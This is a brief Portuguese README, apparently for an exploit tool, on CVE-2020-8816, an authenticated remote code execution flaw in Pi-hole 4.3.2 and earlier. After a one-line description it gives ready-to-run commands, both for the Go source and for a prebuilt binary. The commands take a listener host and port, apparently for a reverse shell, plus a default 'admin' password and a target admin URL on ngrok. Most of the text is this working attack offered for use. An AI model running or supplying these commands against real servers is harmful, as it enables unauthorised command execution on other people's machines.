
Pi-hole ( <= 4.3.2) execução remota de código autenticada.
Pi-hole (versões <= 4.3.2) é afetado por uma vulnerabilidade de Execução Remota de Código. Um usuário autenticado do portal Web pode executar comandos arbitrários no servidor subjacente com os privilégios do usuário local que executa o serviço.
go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/
ou baixe o binário CVE-2020-8816 :
./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/